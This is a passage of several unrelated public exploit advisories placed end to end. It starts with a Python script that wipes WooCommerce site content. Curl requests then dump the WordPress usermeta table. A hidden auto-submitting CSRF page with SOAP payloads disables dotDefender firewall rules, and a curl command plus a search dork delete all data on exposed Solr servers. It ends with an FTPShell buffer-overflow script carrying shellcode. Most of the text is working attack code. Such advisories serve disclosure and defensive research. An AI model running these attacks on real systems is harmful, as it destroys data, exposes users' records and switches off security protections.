- Permanently delete all orders
- Permanently delete all comments
All these actions they normally require administrative wrights. But in this case any registered user can perform these actions, even with the most limited wrights, therefor this issue is considered as an Privilege Escalation vulnerability.
PoC
---
The following script will nuke nearly all site content from `example.com` using the account with username:`username` and password:`password`. This has to be an already registered account for this to work.
'''
#!/usr/bin/python3
################################################################################
# WooCommerce - Store Toolkit Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your site content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import requests
loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
l = requests.post(loginUrl, data=loginPostData)
if len(l.history) > 1:
loggedInCookies = l.history[0].cookies
else:
loggedInCookies = l.cookies
if len(loggedInCookies) == 0:
print("Couldn't acquire a valid session")
exit(1)
actions = [
'woo_st_products',
'woo_st_categories',
'woo_st_product_categories',
'woo_st_product_tags',
'woo_st_product_brands',
'woo_st_product_vendors',
'woo_st_product_images',
'woo_st_coupons',
'woo_st_attributes',
'woo_st_sales_orders',
'woo_st_tax_rates',
'woo_st_download_permissions',
'woo_st_creditcards',
'woo_st_google_product_feed',
'woo_st_posts',
'woo_st_post_categories',
'woo_st_post_tags',
'woo_st_links',
'woo_st_comments',
'woo_st_media_images'
]
for action in actions:
print('Trying action '+action)
a = requests.post(adminUrl, data={'action': 'nuke', action:1}, cookies=loggedInCookies, timeout=30)
if a.status_code == 200:
print('Nuked with action '+action)
else:
print('Something went wrong with action '+action)
exit(0)
'''
Solution
--------
Upgrade to v1.5.7
Timeline
--------
1. 2016-02-07: Vendor notified through WordPress support forums
2. 2016-02-07: Vendor notified through his homepage support
3. 2016-02-07: Requested CVE ID
4. 2016-02-07: Vendor responded
5. 2016-02-07: Send issue details to vendor
6. 2016-02-08: Vendor released version 1.5.7 which resolves this issue
'''
* Exploit Title: WordPress User Meta Manager Plugin [Information Disclosure]
* Discovery Date: 2015-12-28
* Public Disclosure Date: 2016-02-01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4
* Category: webapps
## Description
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a information disclosure vulnerability. Any registered user can perform an a series of AJAX
requests, in order to get all contents of `usermeta` DB table.
`usermeta` table holds additional information for all registered users. User Meta Manager plugin offers a `usermeta` table backup functionality. During the backup process the plugin takes no action in protecting the leakage of the table contents to unauthorized (non-admin) users.
## PoC
### Get as MySQL query
First a backup table must be created
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\
?action=umm_switch_action&umm_sub_action=umm_backup"
Then we get the table with another request
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\
?action=umm_switch_action&umm_sub_action=umm_backup&mode=sql"
### Get as CSV file
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\
?action=umm_switch_action&umm_sub_action=umm_get_csv"
## Solution
Upgrade to version 3.4.8
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt
Vendor:
==================
www.applicure.com
Product:
=====================
dotDefender Firewall
Versions: 5.00.12865 / 5.13-13282
dotDefender is a Web application firewall (WAF) for preventing hacking
attacks like XSS, SQL Injections, CSRF etc...
that provides Apache and IIS Server Security across Dedicated, VPS and
Cloud environments. It meets PCI Compliance and also
provides E-Commerce Security, IIS and Apache Security, Cloud Security and
more.
Vulnerability Type:
=================================
Cross Site Request Forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Dotdefender firewall (WAF) is vulnerable to cross site request forgery,
this allows attackers to make HTTP requests via the victims browser to
the dotdefender management server on behalf of the victim if the victim is
logged in and visits a malicious web page or clicks an infected link.
Result can be modifying or disabling various firewall patterns,
User-Defined Rule settings and global event logging etc...
HTTP requests sent to Dotdefender to enable or disable user-Defined rule
settings are base64 encoded using SOAP protocol.
Sending the below base64 value for example disables a Dotdefender firewall
setting.
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>
Tested successfully on Windows & Linux:
dotDefender Version: 5.00.12865
Web Server Type: Microsoft-IIS
Server Operating System: Windows
Web Server Version: 7.5
Firefox web browser
dotDefender Version: 5.13-13282
Web Server Type: Apache
Server Operating System: Linux
Exploit code(s):
===============
Example to send requests to disable firewall rule settings that defends
against SQL injection.
We need to send two requests first to modify the desired settings and
second to commit our changes.
HTTP request 0x01 - send following soap request to disable SQL Injection
request firewall rule
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
<IFRAME style="display:none" name="demonica"></IFRAME>
<form target="demonica" id="SACRIFICIAL" action="
http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
method="post" onsubmit="TORMENT()">
<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Body xmlns:ns1="http://applicure.com/dotDefender">
<ns1:set_xpath><site xsi:type="xsd:string">0</site>
<xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=1]/enabled</xpath>
<xml xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml>
</ns1:set_xpath></soapenv:Body></soapenv:Envelope>'>
<script>document.getElementById('SACRIFICIAL').submit()</script>
</form>
HTTP request 0x02 - send the next request to commit the changes
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
<form target="demonica" id="VICTIM" action="
http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
method="post">
<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:commit>
<sites><element0 id="0" xsi:type="xsd:string">0</element0></sites>
</ns1:commit></soapenv:Body></soapenv:Envelope>'>
<script>function
TORMENT(){document.getElementById('VICTIM').submit()}</script>
</form>
Other SOAP payload examples for rule disabling:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
this is disable a rule #19, send the below request to disable remote IP
protections:
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ZSI="
http://www.zolera.com/schemas/ZSI/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="
http://schemas.xmlsoap.org/soap/encoding/"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:set_xpath><site
xsi:type="xsd:string">0</site>
<xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=19]/enabled</xpath>
<xml
xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>
disable rule 20:
~=~=~=~=~=~=~=~=
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
xmlns:ns1="http://applicure.com/dotDefender">
<ns1:set_xpath><site xsi:type="xsd:string">0</site><xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=20]/enabled</xpath>
<xml
xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>
Finally commit them with below request:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
xmlns:ns1="http://applicure.com/dotDefender">
<ns1:commit><sites><element0 id="0"
xsi:type="xsd:string">0</element0></sites></ns1:commit></soapenv:Body></soapenv:Envelope>
Disclosure Timeline:
================================
Vendor Notifications:
initial report 11/16/2015
vendor response 11/20/2015
vendor delays for two months
1/19/2016 Vendor finally acknowledges vulnerability
inform vendor of a disclosure date
vendor no longer responds
Feb 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
==================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] DotDefender v5.0 & v5.13
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
# Exploit Title: All Solr Data Can Be Delete
# Google Dork: intext:[Schema] [Config] [Analysis] [Schema Browser]
[Statistics] [Info] [Distribution] [Ping] [Logging]
# Date: 5/2/2016
# Exploit Author: N37 [Myanmar]
# Vendor Homepage: http://lucene.apache.org/solr/
# Software Link: https://archive.apache.org/dist/lucene/solr/3.5.0/
# Version: 3.5.0
# Tested on: fedora 23
Solr is open source enterprise search platform built on Apache Lucene.
It can be delete all data in solr. solr are use nlp, money of data research, data mining, some of mobile backend on vps .
POC or Eg.
This Query is shwo all data in solr :
http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on
You can delete all data with curl in terminal :
curl -X GET "server:8080/solr/lambeth_locations/update?stream.body=<delete><query>*:*<%2Fquery><%2Fdelete>&commit=true"
now you can check with first query in browser. All data are deleted.
Regards,
N37 [Myanmar]
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#77FAB277 JMP ESP
# Windows Xp Professional Version 2002 Service Pack 3
eip = "\x77\xB2\xFA\x77"
# Nops
nops = "\x90"*100
# Shellcode Calc.exe 16Byte
buf=("\x31\xC9"
"\x51"
"\x68\x63\x61\x6C\x63"
"\x54"
"\xB8\xC7\x93\xC2\x77"
"\xFF\xD0")
#Appending Buffers Together
exploit = junk + eip + nops + buf
#Creating File
length = len(exploit)
print "[+]File name: [%s]\n" % filename
print "[+]Payload Size: [%s]\n " % length
print "[+]File Created.\n"
file = open(filename,"w")
file.write(exploit)
file.close
print exploit
#[+] Very Special Tnx To My Best Friends: TheNonexistent,Nirex,Pr0t3ctor